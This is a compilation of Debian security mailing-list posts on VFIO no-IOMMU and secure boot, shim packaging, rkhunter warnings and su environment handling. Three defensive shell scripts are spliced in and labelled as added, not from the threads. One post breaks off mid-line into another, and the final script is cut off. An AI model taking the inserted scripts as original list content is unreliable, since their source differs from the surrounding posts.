Re: [arm64] secure boot breach via VFIO_NOIOMMU

2023-12-14 Thread Steve McIntyre
On Thu, Dec 14, 2023 at 09:26:09AM +0100, Salvatore Bonaccorso wrote:
>Hi,
>
>On Wed, Dec 13, 2023 at 10:45:01PM +0100, Bastian Blank wrote:
>> Hi
>> 
>> Over six years ago, support for VFIO without IOMMU was enabled for
>> arm64.  This is a breach of the integrity lockdown requirement of secure
>> boot.
>> 
>> VFIO is a framework for handling devices in userspace.  To make
>> this safe, an IOMMU is required by default.  Without it, user space can
>> write everywhere in memory.  The code is still not conditional on
>> lockdown, even if a patch was proposed.
>> 
>> I intend to disable this option for all supported kernels.

Definitely.

>Agreed. 
>
>For the readers reading this along, this was raised in context of
>https://salsa.debian.org/kernel-team/linux/-/merge_requests/925#note_446730
>and 
>https://salsa.debian.org/kernel-team/linux/-/merge_requests/502#note_315464 
>
>The proposed patch probably fell through the cracks.

Nod.

-- 
Steve McIntyre, Cambridge, UK. st...@einval.com
The two hard things in computing:
 * naming things
 * cache invalidation
 * off-by-one errors  -- Stig Sandbeck Mathisen
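As an added check (mine, not from the thread), here is how a defender can confirm that a kernel build and a running system do not expose VFIO's no-IOMMU mode, which is what Bastian's message is about: the config symbol CONFIG_VFIO_NOIOMMU, the vfio module parameter enable_unsafe_noiommu_mode and the /sys/kernel/security/lockdown file are the kernel's own names, while the file paths are parameters so the checks can be run against copies.

```shell
#!/bin/sh
# Added example, not from the thread: report whether a kernel build has VFIO's
# "no-IOMMU" mode compiled in and whether it is switched on at runtime.
# Without an IOMMU a userspace VFIO driver can DMA anywhere in RAM, which
# defeats the integrity guarantee Secure Boot lockdown is meant to provide.

# Look up one CONFIG_ symbol in a kernel .config-style file.
# Prints "y", "m", "n" (explicitly unset) or "absent".
kconfig_value() {
    file=$1; sym=$2
    if grep -q "^${sym}=y$" "$file" 2>/dev/null; then echo y
    elif grep -q "^${sym}=m$" "$file" 2>/dev/null; then echo m
    elif grep -q "^# ${sym} is not set$" "$file" 2>/dev/null; then echo n
    else echo absent
    fi
}

# Build-time verdict: 0 when the option is off or absent, 1 when
# CONFIG_VFIO_NOIOMMU is compiled in.
vfio_noiommu_built_in() {
    case $(kconfig_value "$1" CONFIG_VFIO_NOIOMMU) in
        y|m) return 1 ;;
        *)   return 0 ;;
    esac
}

# Runtime switch: the vfio module exposes its setting as
# /sys/module/vfio/parameters/enable_unsafe_noiommu_mode ("Y" or "N").
# Returns 0 if unsafe mode is on, 1 if it is off or the file is absent.
vfio_noiommu_runtime_enabled() {
    [ -r "$1" ] && [ "$(cat "$1")" = Y ]
}

# Current lockdown mode from /sys/kernel/security/lockdown, which reads
# like "none [integrity] confidentiality"; prints the bracketed word.
lockdown_mode() {
    sed -n 's/.*\[\([a-z]*\)\].*/\1/p' "$1" 2>/dev/null
}

# Combined verdict for one system: prints a one-line summary and returns 0
# when no-IOMMU VFIO is neither built in nor enabled, 1 otherwise.
# Arguments default to the live kernel's files.
vfio_noiommu_audit() {
    config=${1:-/boot/config-$(uname -r)}
    param=${2:-/sys/module/vfio/parameters/enable_unsafe_noiommu_mode}
    lockdown=${3:-/sys/kernel/security/lockdown}
    built=$(kconfig_value "$config" CONFIG_VFIO_NOIOMMU)
    mode=$(lockdown_mode "$lockdown" || true)
    if vfio_noiommu_runtime_enabled "$param"; then runtime=on; else runtime=off; fi
    echo "CONFIG_VFIO_NOIOMMU=$built runtime=$runtime lockdown=${mode:-unknown}"
    [ "$built" != y ] && [ "$built" != m ] && [ "$runtime" = off ]
}

# Run the audit against the live system when invoked with --live.
[ "${1:-}" = --live ] && vfio_noiommu_audit
```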



Re: Problems with shim and shim-signed in unstable, and proposed solutions to unblock us

2019-03-06 Thread Steve McIntyre
On Mon, Mar 04, 2019 at 04:30:46PM +, Steve McIntyre wrote:
>>
>>3. Upload new version of the shim-signed source package and a
>>   (lightly) bodged binary package
>>3a. Use versions:
>> - source: 1.28+nmu2
>> - binary: 1.28+nmu2+0.9+1474479173.6c180c6-1
>>3b. Needs as build-deps an old version of sbsigntool (0.6-3.2) and
>>specifically version 0.9+1474479173.6c180c6-1 of shim in the
>>build chroot
>>3c. Then upload source+amd64
>>3d. New shim-signed binary package changes in a few ways:
>>* new version of the binary now include fbx64.efi.signed and
>>  mmx64.efi.signed (copied across from the shim binary package)
>>* add Replaces: shim (= 0.9+1474479173.6c180c6-1) so we don't
>>  conflict on those binaries
>>* remove Depends: shim (the whole point!)
>>* change Build-Depends to list the specific versions used for
>>  shim and sbsigntool
>>3e. Already tested and working. I built this (source and binary
>>debdiffs attached) and tested OK on SB system
>>3f. This package is instantly RC-buggy due to the unavailable
>>build-deps. We know...

I've just uploaded #3 to unstable this evening.

-- 
Steve McIntyre, Cambridge, UK. st...@einval.com
"You can't barbecue lettuce!" -- Ellie Crane




Re: Problems with shim and shim-signed in unstable, and proposed solutions to unblock us

2019-03-04 Thread Steve McIntyre
I've had a reply from Mark (ftpteam) in IRC:

On Sun, Mar 03, 2019 at 11:35:45PM +0000, Steve McIntyre wrote:

...

>So, we're looking at three hacky options here to work our way
>out of this hole. In (probably?) descending order of hackitude:
>
>1. Ask the nice ftpmaster people to bodge the archive by hand:
>1a. Remove the current shim source and binary packages from
>unstable (version 15+1533136590.3beb971-2)
>1b. Copy the older source and binary from buster back into
>unstable for us.
>1c. We're not even sure if this is *possible*, let alone a nice
>thing to do - thoughts?
>1d. Expecting that this might break all kinds of tools inside and
>outside of the archive maybe?

And Mark says:

"we don't want to go rewinding version numbers in unstable; that could
lead to all sorts of unforeseeable breakage.

much as we'd expected. Any more feedback please? Cyril prefers
approach #2 below, I prefer #3.

>OR
>
>2. Upload new bodged versions of shim and shim-signed to get us
>   back to working with the previously-signed shimx64.efi.signed
>   binary
>2a. Create new shim and shim-signed source packages, along with
>matching binary packages.
>2b. These binary packages will contain the *exact* same EFI
>binaries as we have in buster but with a higher version number
>in the packaging.
>2c. As we cannot *exactly* reproduce the binaries sensibly, we
>will have to hand-hack the contents of the binary packages.
>2d. We *know* this is grotty too, but we can at least make this
>work entirely at a package level.
>2e. Already tested and working: Cyril has built packages like this
>and I have tested the results successfully on my test SB
>system here.
>
>Current versions in buster:
> - shim:
>- source: 0.9+1474479173.6c180c6-1
>- binary: 0.9+1474479173.6c180c6-1
> - shim-signed:
>- source: 1.28+nmu1
>- binary: 1.28+nmu1+0.9+1474479173.6c180c6-1
>
>Possible versions targeting sid:
> - shim:
> - source: 16+1474479173.6c180c6-1 (bumped “epoch-like” N+
>   prefix, but same contents as 0.9+1474479173.6c180c6-1)
> - binary: 16+1474479173.6c180c6-1
> - shim-signed:
> - source: 1.28+nmu2 (new upload to adjust the Depends)
> - binary: 1.28+nmu2+16+1474479173.6c180c6-1
>
>OR
>
>3. Upload new version of the shim-signed source package and a
>   (lightly) bodged binary package
>3a. Use versions:
> - source: 1.28+nmu2
> - binary: 1.28+nmu2+0.9+1474479173.6c180c6-1
>3b. Needs as build-deps an old version of sbsigntool (0.6-3.2) and
>specifically version 0.9+1474479173.6c180c6-1 of shim in the
>build chroot
>3c. Then upload source+amd64
>3d. New shim-signed binary package changes in a few ways:
>* new version of the binary now include fbx64.efi.signed and
>  mmx64.efi.signed (copied across from the shim binary package)
>* add Replaces: shim (= 0.9+1474479173.6c180c6-1) so we don't
>  conflict on those binaries
>* remove Depends: shim (the whole point!)
>* change Build-Depends to list the specific versions used for
>  shim and sbsigntool
>3e. Already tested and working. I built this (source and binary
>debdiffs attached) and tested OK on SB system
>3f. This package is instantly RC-buggy due to the unavailable
>build-deps. We know...

-- 
Steve McIntyre, Cambridge, UK. st...@einval.com
Is there anybody out there?




Problems with shim and shim-signed in unstable, and proposed solutions to unblock us

2019-03-03 Thread Steve McIntyre
[ Note CCs to multiple lists - we know multiple groups of people have
  an interest in this... ]

Hi folks,

We have issues with the setup of the shim and shim-signed packages in
unstable at the moment, which is quite awkward to fix. See #922179 for
the original bug report.

shim and shim-signed have an ... awkward relationship, which causes us
multiple problems at the moment.

1. shim is the primary source package, building one binary package
   which included several EFI binaries - the shimx64.efi binary
   itself, plus two helpers (fbx64.efi.signed and
   mmx64.efi.signed)

2. shimx64.efi is the EFI binary that is submitted to Microsoft
   for signing - it's the core of our Secure Boot implementation
   (like all Linux distros)
2b. The MS-signed binary (shimx64.efi.signed) is shipped in the
shim-signed source package and passed through to the
shim-signed binary package
2c. The shim-signed source package validates that the binary
matches what we built in shim, and checks that the signature
applies.

3. For $reasons, the existing shim-signed binary package has a
   strict versioned dependency on the shim binary package to pull
   in the helper binaries for installation. We are very much
   planning on fixing this, but this is the historical setup.

4. As requested, Steve Langasek uploaded a new upstream version of
   shim to unstable (15+1533136590.3beb971-2, which is there right
   now).

5. Until we get an MS signature on a new shim binary, we will
   *not* have a matching shim-signed binary package, so for now we
   still have the *old* (1.28+nmu1+0.9+1474479173.6c180c6-1)
   shim-signed binary and source in unstable.

6. Everything works OK right now in buster, but...

7. Right now, shim-signed is not installable in sid, which means that:
7a. People can't test SB in unstable
7b. (Worse) as shim-signed is a build-dep for d-i on amd64 (to be
able to make SB-compatible installer images) we currently
can't build d-i

8. We don't have an ETA for a new signature from MS which would
   unblock us. At *best*, we're expecting a few weeks. It's out of
   our control.

FTAOD: this dependency problem has been here as a time bomb ever since
day 1 of shim in Debian. We just haven't ever noticed as nobody was
using these packages until very recently. Apologies for not spotting
the problem before we uploaded newer versions and triggered
this. AFAIK Ubuntu have got away with a very similar configuration due
to a different archive setup.

We're planning on redoing the packaging to get away from these
problems ASAP so this problem will not recur. However, fixing things
cleanly now is not easy:
 
 1. We can't simply re-upload a new shim source package to get a
new shim binary with the same version number as the old one
 2. The old version of the shim binary package is encoded in the
dependencies of the shim-signed binary package
 3. We cannot reproduce the shimx64.efi EFI binary if we rebuild
it today (Cyril has tried multiple ways), so we *cannot*
simply upload a new shim source package and hope...

So, we're looking at three hacky options here to work our way
out of this hole. In (probably?) descending order of hackitude:

1. Ask the nice ftpmaster people to bodge the archive by hand:
1a. Remove the current shim source and binary packages from
unstable (version 15+1533136590.3beb971-2)
1b. Copy the older source and binary from buster back into
unstable for us.
1c. We're not even sure if this is *possible*, let alone a nice
thing to do - thoughts?
1d. Expecting that this might break all kinds of tools inside and
outside of the archive maybe?

OR

2. Upload new bodged versions of shim and shim-signed to get us
   back to working with the previously-signed shimx64.efi.signed
   binary
2a. Create new shim and shim-signed source packages, along with
matching binary packages.
2b. These binary packages will contain the *exact* same EFI
binaries as we have in buster but with a higher version number
in the packaging.
2c. As we cannot *exactly* reproduce the binaries sensibly, we
will have to hand-hack the contents of the binary packages.
2d. We *know* this is grotty too, but we can at least make this
work entirely at a package level.
2e. Already tested and working: Cyril has built packages like this
and I have tested the results successfully on my test SB
system here.

Current versions in buster:
 - shim:
- source: 0.9+1474479173.6c180c6-1
- binary: 0.9+1474479173.6c180c6-1
 - shim-signed:
- source: 1.28+nmu1
- binary: 1.28+nmu1+0.9+1474479

Re: powerpc update for amd64

2018-03-04 Thread Steve Kemp
On Sun Mar 04, 2018 at 07:35:37 +0100, SZÉPE Viktor wrote:

> What is the use of pushing an update with only powerpc changes to amd64?
> Thank you.

  This is just a side-effect of the way the packages are built. 
  
  When a new source upload is made then it is built for all available
 architectures, even if the changes are not useful / relevant for them.

  Typically security updates apply to all architectures.  In this
 case just be glad you got "lucky" - and you don't have to schedule
 reboot(s) of all your server(s).

Steve
-- 
https://steve.fi/



Re: [SECURITY] [DSA 3074-2] php5 regression update

2014-11-19 Thread Steve Kemp
On Wed Nov 19, 2014 at 14:57:13 +0100, David MENTRE wrote:

> >so people are advised to keep kernel
> >symlink protection (sysctl fs.protected_symlinks=1) enabled as it is by
> >default on Wheezy
> 
> This setting is not set on my Wheezy machine.
> 
> How can I set it permanently (i.e. across reboots).

  Take a look at /etc/sysctl.conf, and the comments at the top of that
 file pointing to the man-page and other locations.

Steve
-- 
Git-based DNS hosting
https://dns-api.com/


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20141119140951.ga15...@steve.org.uk



Re: about bash and Debian Lenny

2014-10-02 Thread Steve
> Shellshock has such big impact on the internet so please give us Lenny 
> package.

  You need to remember that Debian is a project staffed by volunteers,
 some of whom have already offered packages.  If you cannot trust random
 binaries then the patches are available.

  If you do have a legitimate reason for not upgrading, then your
 choices are few - and largely consist of:

* Rolling your own packages, via the public patches, which you will
  then trust.

* Finding somebody trustworthy.

* Upgrading.

  My personal response to somebody requesting newer updates has got to
 be "What is your budget?"..


Steve
-- 
http://www.steve.org.uk/


Re: goals for hardening Debian: ideas and help wanted

2014-04-24 Thread Steve Langasek
On Thu, Apr 24, 2014 at 11:45:46AM +0200, Giacomo Mulas wrote:
> On Thu, 24 Apr 2014, Paul Wise wrote:
> >>Would the inclusion of more AppArmor profiles be applicable?

> >Thanks, added along with SELinux/etc.

> I second that. Actually, some time ago I tried using both AppArmor and
> SELinux, but gave up because it took forever to find legitimate behaviour of
> all kinds of common packages (most of them standard debian packages) and
> prepare configuration files for things to work. If debian wants to foster
> adoption of such security enhancements, it must go to great lengths in
> making sure that (in order of importance in my humble opinion)

> 1) all debian-packaged software works (very nearly) out of the box with
> debian-supported MAC frameworks. It should be very clear that if they don't
> it's an important bug that needs fixing. For example, such bugs should
> prevent the inclusion of a package in an official stable release. Or split
> the main debian archive in two, one that is MAC-ready and one that is not,
> so each user can decide to only use packages known to work well with
> debian-supported MAC frameworks.

The apparmor policies in Debian apply a principle of minimal harm, confining
only those services for which someone has taken the time to verify the
correct profile.  There are obviously pros and cons to each approach to MAC,
which I'm not interested in arguing about; but one of the pros of the
approach taken for apparmor is that all software *does* continue to work out
of the box.  If you found it otherwise, I think you should be filing a bug
report against apparmor.

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
Ubuntu Developerhttp://www.debian.org/
slanga...@ubuntu.com vor...@debian.org




Re: [SECURITY] [DSA 2521-1] libxml2 security update

2012-08-04 Thread Steve Dispensa
My guess is libpfhttphook is not vulnerable. I'd like to hear from someone else 
though. 

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679280

 -Steve

Sent from my phone

On Aug 4, 2012, at 12:31, "Moritz Muehlenhoff"  wrote:

> CVE-2012-2807


Archive: http://lists.debian.org/d17d2162-1fa7-44d9-9b11-0ec5a5313...@phonefactor.com



Re: Logs errors on Debian Squeeze with Bind 9.7.3

2011-06-28 Thread Steve Suehring
Hello,

Couple thoughts:

1) You should add semi-colons onto the end of the category lines within 
the logging stanza.

2) I take it that you restarted bind after making changes in the 
configuration file?

Also note that /etc/bind/namec.conf.options is the preferred place for 
the logging stanza, or so I've gathered.

Steve
http://www.braingia.org/

On Tue, Jun 28, 2011 at 01:13:31PM -0300, OLCESE, Marcelo Oscar. wrote:
> Good morning people
> Since I upgraded to BIND 9.7.3 Debian 6, I'm having a lot of logs as
> I've outlined.
> 
>error (network unreachable) resolving
> '98.31.207.117.in-addr.arpa/PTR/IN': 2001:500:13::73#53: 1 Time(s)
>error (network unreachable) resolving
> 'ABTS-mp-Dynamic-075.161.168.122.airtelbroadband.in/A/IN':
> 2001:500:45::1#53: 1 Time(s)
>error (network unreachable) resolving
> 'NSS2.CODETEL.NET.DO//IN': 2001:468:d01:20::80df:2023#53: 1
> Time(s)
>error (network unreachable) resolving 'SEC3.APNIC.NET/A/IN':
> 2001:500:13::c7d4:35#53: 1 Time(s)
>error (unexpected RCODE REFUSED) resolving
> '222.187.173.122.in-addr.arpa/PTR/IN': 202.56.230.5#53: 1 Time(s)
>error (unexpected RCODE REFUSED) resolving
> '244.76.168.122.in-addr.arpa/PTR/IN': 202.56.230.6#53: 1 Time(s)
>error (unexpected RCODE REFUSED) resolving
> 'ns01.wl-infra.net/A/IN': 62.75.191.6#53: 2 Time(s)
>error (unexpected RCODE SERVFAIL) resolving 'ns6.kvack.org/A/IN':
> 199.249.120.1#53: 1 Time(s)
>error (unexpected RCODE SERVFAIL) resolving 'utn.edu.ar/NS/IN':
> 200.16.98.2#53: 1 Time(s)
>error (unexpected RCODE SERVFAIL) resolving
> 'zone-ns6.dnswl.org/A/IN': 199.249.120.1#53: 1 Time(s)
>success resolving
> 'ABTS-MP-Dynamic-073.132.175.122.airtelbroadband.in/A' (in
> 'airtelbroadband.in'?) after disabling EDNS: 1 Time(s)
>success resolving
> 'ABTS-North-Dynamic-222.187.173.122.airtelbroadband.in/A' (in
> 'airtelbroadband.in'?) after reducing the advertised EDNS UDP packet
> size to 512 octets: 1 Time(s)
>success resolving
> 'ABTS-North-Static-039.25.160.122.airtelbroadband.in/A' (in
> 'airtelbroadband.in'?) after disabling EDNS: 1 Time(s)
>success resolving 'dnsbom.mantraonline.com/' (in
> 'mantraonline.com'?) after disabling EDNS: 1 Time(s)
>success resolving 'dnsdel.mantraonline.com/A' (in
> 'mantraonline.com'?) after disabling EDNS: 1 Time(s)
> 
> I already made several changes including:
> 
> /etc/default/bind9
> 
> Resolvconf = yes
> OPTIONS = "-4-u bind-S 1024"
> 
> and named.conf:
> 
> logging {
> category lame-servers {null;}
> category edns-disabled {null;}
> };
> 
> Any ideas?
> 
> Regards,
> Marcelo O.
> 
> 
> Archive: http://lists.debian.org/F0811723E5FB4D0A9D370D1D702B62D8@Marcelopc


Archive: http://lists.debian.org/20110628211139.ga11...@braingia.org



Re: [SECURITY] [DSA-2158-1] cgiirc security update

2011-02-11 Thread Steve Kemp
On Fri Feb 11, 2011 at 10:37:46 +0100, Axel Beckert wrote:

> This package does not yet show up in Lenny. According to
> http://packages.debian.org/search?keywords=cgiirc 0.5.9-3lenny1 has
> been uploaded to squeeze's security repo only.

  Yes - this has been a bit of a mess, due to the release occurring
 during the middle of the preparation and release of the update.

  I'm uploading for lenny/old-security now.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/


Archive: http://lists.debian.org/20110211102255.ga1...@steve.org.uk



Re: Results of environment variable fuzzing Debian 5.05 SUID/SGIDs

2011-01-18 Thread Steve Kemp
On Tue Jan 18, 2011 at 22:25:20 +1100, Silvio Cesare wrote:

>This kind of testing is good for Debian security and provides some comfort
>to me at least knowing this class of vulnerability has been tested for
>against the privileged programs in the Debian repository.

  Agreed.

  I started doing the same thing a few years ago, and it was very
  useful.

  However to make your reports more thorough it is important to look
 at the source of the code to see if the crash is an exploitable one
 or not.  Ideally you'd include that information in any bug
 reports you submitted.

Steve
-- 
http://www.steve.org.uk/


Archive: http://lists.debian.org/20110118114447.ga9...@steve.org.uk



Re: Results of environment variable fuzzing Debian 5.05 SUID/SGIDs

2011-01-18 Thread Steve Kemp
On Tue Jan 18, 2011 at 13:49:23 +1100, Silvio Cesare wrote:

>lbreakout2 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=608980

  That could well be a duplicate of CAN-2004-0158, which was fixed 
 in Woody: 

http://lists.debian.org/debian-changes/2004/02/msg00029.html

Steve
-- 
http://www.steve.org.uk/


Archive: http://lists.debian.org/20110118091546.ga32...@steve.org.uk



Re: libapache2-mod-fcgid in lenny vulnerable to hole for weeks

2010-12-23 Thread Steve Kemp
On Tue Dec 21, 2010 at 22:21:35 +0100, Stefan Fritsch wrote:

> FWIW, it seems the infrastructure has been finally fixed today, so I 
> hope things will improve now. But I do think that there are currently 
> too few active members in the security team. I am pretty sure we will 
> send out a request for new volunteers soon.

  If there were a need for it I'd be happy to make myself available
 again for team work.

  I don't expect I'm going to suffer from being busy in the way
 that I was previously again.

Steve
-- 
http://www.steve.org.uk/


Archive: http://lists.debian.org/20101223140859.ga21...@steve.org.uk



Re: rkhunter warning wget

2009-10-15 Thread Steve Kemp
On Thu Oct 15, 2009 at 17:55:39 +0200, m...@firstfloor.org wrote:

> after updating wget on
>
> Linux version 2.6.26-2-686 (Debian 2.6.26-19) Lenny
>
> I received a warning from rkhunter:
>
> Warning: The file properties have changed:
>  File: /usr/bin/wget
>  Current hash: 2d5d175c449eecfda43401a7a66b8a369859524d
>  Stored hash : 1725543768f7e1b2a32136ca1799213a8bdb886b
>  Current inode: 137892Stored inode: 140983
>  Current size: 226292Stored size: 226260
>  Current file modification time: 1255005510
>  Stored file modification time : 1220829421


  You've applied a security update, which has changed
 the binary /usr/bin/wget.

  The alert is telling you that the binary has changed,
 and since this is expected (because you've applied the security update)
 the alert is informational not a real report.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
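As an added example (mine, not from the thread), this is the check I would run before dismissing such a warning: rkhunter only knows that the file differs from its stored baseline, while the md5sums lists dpkg keeps under /var/lib/dpkg/info say what the currently installed package shipped, so comparing against them tells a package update apart from tampering. The info directory and filesystem root are parameters so the check can run against copies; the sample package data in the test is constructed.

```shell
#!/bin/sh
# Added example, not from the thread: decide whether a binary that rkhunter
# reports as changed still matches what the Debian package manager installed.
# rkhunter's stored hash is its own baseline; dpkg's <pkg>.md5sums lists are
# the reference for "what the current package shipped". If the two agree the
# warning is explained by an update; if they disagree, investigate.

# Print the md5 dpkg recorded for PATH (stored without the leading slash),
# searching every package's md5sums list under INFO_DIR, normally
# /var/lib/dpkg/info. Empty output means no package owns the file.
dpkg_recorded_md5() {
    info_dir=$1; rel=${2#/}
    # each line is "<md5>  <relative path>"
    awk -v p="$rel" '$2 == p { print $1; exit }' "$info_dir"/*.md5sums 2>/dev/null
}

# md5 of an actual file (md5sum on Linux, md5 on BSD/macOS).
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then md5sum "$1" | awk '{print $1}'
    else md5 -q "$1"
    fi
}

# Verdict for one file. ROOT is where the filesystem is mounted ("/" on a
# live system). Returns 0 = matches the package record, 1 = mismatch,
# 2 = not owned by any package (so dpkg cannot vouch for it either way).
verify_against_dpkg() {
    info_dir=$1; root=${2:-/}; path=$3
    expected=$(dpkg_recorded_md5 "$info_dir" "$path" || true)
    [ -n "$expected" ] || return 2
    [ "$(file_md5 "${root%/}/${path#/}")" = "$expected" ]
}

# Report on one file of the live system, e.g. ./check.sh /usr/bin/wget
if [ -n "${1:-}" ]; then
    rc=0; verify_against_dpkg /var/lib/dpkg/info / "$1" || rc=$?
    case $rc in
        0) echo "$1: matches installed package; refresh rkhunter with --propupd" ;;
        1) echo "$1: DIFFERS from the installed package's md5sums" ;;
        2) echo "$1: not owned by any package" ;;
    esac
fi
```

Only after the file checks out should the baseline be refreshed with `rkhunter --propupd`; running it first would silently accept a tampered binary.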





Re: Maintaining packages properly

2009-03-19 Thread Steve Kemp
On Wed Mar 18, 2009 at 21:01:04 -0400, Micah Anderson wrote:

> However, I do see your point about NEW packages, and it might be
> interesting, if we could get enough security auditors who had the skills
> and the time, to be a part of the NEW process. This could introduce an
> unnecessary delay in the processing of packages, depending on the depth
> and breadth of such an audit. Or even a false sense of security if
> people think that their packages are free of security holes if they've
> passed NEW.

  The security audit project mostly seems to have stalled/died.  There
 was a time when there were people actively taking part and doing
 semi-directed audits of the archive.

  These days it is very very rare that anybody does so, which is
 unfortunate (speaking both as the person who started it, and as somebody
 who would love to have such an effort be more visible and active.)

  I've been on the point of updating the webpages several times to
 say "this activity is dead, and these are merely historic notes" but
 haven't quite wanted to admit defeat.

> > Maybe more people could join the debian security audit team? For a lot
> > of PHP packages it would be enough to check whether certain functions
> > (e.g.  htmlspecialchars) are found. If not, this is often an
> > indication of insufficient protection measures.
>
> Calling all interested security people who have just been dying to
> show their skills, or develop stronger auditing skills!

  I think if there is no such response then it is definitely time to
 call it a day and cease pretending we have auditors on hand.

Steve
--
Managed Anti-Spam Service
http://mail-scanning.com/





Re: Why is su preserving the environment?

2009-01-24 Thread Steve Langasek
On Sat, Jan 24, 2009 at 08:41:37AM +0100, Josselin Mouette wrote:

> it has been brought to my attention (through #512803) that su does not
> clean the environment at all. This has several security implications:
>   * variables like PERL5LIB or GTK_MODULES can be passed to another
> user, leading to unwanted execution of code;
>   * variables like DBUS_SESSION_BUS_ADDRESS or XDG_SESSION_COOKIE
> export authentication information that could be used to obtain
> private information such as passwords in gnome-keyring.

> Before I work around this specific issue in the fugliest way, shouldn’t
> we prevent su from preserving the environment?

> There have been several security advisories related to sudo not cleaning
> the environment, and the final call has been to make env_reset the
> default. Is there any reason why su should not be considered vulnerable
> the same way?

Because su does not attempt to control what commands are being run; if you
can su to another user, you can run arbitrary commands as that user, which
means there's no sense in trying to filter the environment.

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
Ubuntu Developerhttp://www.debian.org/
slanga...@ubuntu.com vor...@debian.org





Re: [SECURITY] [DSA-1645-1] New lighttpd packages fix various problems

2008-10-06 Thread Steve Kemp
On Mon Oct 06, 2008 at 20:40:36 +0200, Gerfried Fuchs wrote:

>  From reading the changelog these issues have all three been addressed
> in the 1.4.19-5 upload which was done a week ago already. Was this
> missed, or are the patches therein considered incomplete?

  This was missed.

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/





Re: Bug#311772: Fwd: Password leaks are security holes

2008-08-28 Thread Steve Langasek
On Thu, Aug 28, 2008 at 09:36:41AM +0200, Giacomo A. Catenazzi wrote:
> auth.log was invented for this reason, and separated to standard log:
> it should be readable only by root,

Then there is a bug in another package if this is what "should" be, because
/var/log/auth.log is readable by group adm on all my systems.

> Anyway root already has the capability to view passwords
> (i.e. by installing alternate login programs, sniffing tty, ...)

If the system uses MAC such as SELinux, this is not necessarily the case.
We should design for such future technologies, and not expose passwords
unnecessarily.

On Thu, Aug 28, 2008 at 01:05:19PM +0200, Johan Walles wrote:
> > auth.log was invented for this reason, and separated to standard log:
> > it should be readable only by root, because users do errors.

> It's readable by anybody with physical access to the hardware.

The logging we're talking about takes place in pam_unix.  The normal
password store for pam_unix is /etc/shadow, which is on the hard drive; if
the user has physical access, they can run a password cracker against this
file anyway and try to grab *all* user passwords, not just those of users
who don't read before they type.

(It's true that the passwords are not in /etc/shadow for systems using
pam_unix together with NIS or NIS+, but I consider both NIS and NIS+ rather
uninteresting cases.)

> > So auth.log should log usernames, so that users don't do
> > wrong assumption that password are not accessible by root!

> I can see a point in logging *valid* usernames.  Logging invalid
> usernames (which aren't unlikely to actually be passwords) is a
> security risk.

It provides information about username brute force attacks and other issues
of concern to admins.

On Thu, Aug 28, 2008 at 11:55:49AM +0200, Nico Golde wrote:
> Maybe this is the case but that's why this file is only 
> readable for root and the adm group. So if an attacker is 
> able to read this file you have way more problems as he 
> wouldn't need to check the auth log for user errors but 
> could just trace the login process, crack shadow, write a 
> custom pam module or something similar to get your login 
> credentials.

No, that's not true.  The only added permission the 'adm' group has on
Debian is to be able to read log files; so this *does* expose passwords to
users who wouldn't otherwise be able to get at them.

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
Ubuntu Developerhttp://www.debian.org/
[EMAIL PROTECTED] [EMAIL PROTECTED]





Re: [SECURITY] [DSA 1631-1] New libxml2 packages fix denial of service

2008-08-26 Thread Steve Kemp
On Tue Aug 26, 2008 at 20:13:58 +0200, Christoph Auer wrote:

> > Debian Security Advisory DSA-1631-_2_  [EMAIL PROTECTED]
> 
> minor error in the subject

  My apologies, I managed to miss that.

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/





Re: [SECURITY] [DSA 1631-1] New libxml2 packages fix denial of service

2008-08-22 Thread Steve Kemp
On Fri Aug 22, 2008 at 21:56:35 +0200, Christian Jaeger wrote:

> Just to make sure: have you seen the thread "Lenny users: attn about  
> Gnome/libxml2 breakage" on the debian-user mailing list (started by me)?

  No, I'm afraid I've not seen that.  But looking over it I'm not
 sure if the problem is the same.  On my personal Debian Unstable
 machine I'm not seeing any breakage - nor on my Etch system.

  It is possible it is solely broken on Lenny, but I don't have any
 systems to look at.

  I see you've reported a bug, so I guess we'll take it from there.

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/





Re: [SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator

2008-05-13 Thread Steve Suehring
On Tue, May 13, 2008 at 06:35:25PM -0300, dererk wrote:
> On Tue, May 13, 2008 at 10:53:25PM +0200, Jan Luehr wrote:
> > rm /etc/ssh/ssh_host_*
> > ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
> > ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
> > /etc/init.d/ssh restart
> > 
> > -> job done.
> > 
> > Keep smiling
> > yanosz
> 
> Shorter one:
> 
> rm /etc/ssh/ssh_host_*
> dpkg-reconfigure openssh-server

Note that doing either of these will result in host key failures and 
warnings for any clients attempting to connect to you.  This is 
especially bad if you have things like rsync over ssh in a cron job.  
Moral of the story is to remember to update your known_hosts and let 
your users know that their ssh client of choice may bark at them.

Steve
http://www.braingia.org
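The breakage Steve warns about can be caught before the cron job trips over it: as an added example (mine, not from the thread), the helpers below check which of a server's host keys a client's known_hosts already trusts, matching on the key blob so they also work with Debian's default HashKnownHosts, which hides the hostnames. The key material in the test is constructed, not real keys.

```shell
#!/bin/sh
# Added example, not from the thread: before (or after) regenerating a server's
# SSH host keys, find out which of its public keys a client's known_hosts
# already contains. A cron job doing rsync over ssh will refuse to connect the
# moment the server's key changes while known_hosts still holds the old one.
# Matching is by "type blob", so hashed known_hosts entries (HashKnownHosts,
# Debian's default) are handled as well as plain hostnames.

# Print "type base64blob" from an OpenSSH public key file (.pub) or a
# known_hosts line, skipping @markers, hostnames/hashes and trailing comments.
key_blob() {
    awk '{
        for (i = 1; i <= NF; i++)
            if ($i ~ /^(ssh-rsa|ssh-dss|ssh-ed25519|ecdsa-sha2-[a-z0-9]+)$/ && i < NF) {
                print $i " " $(i+1); exit
            }
    }'
}

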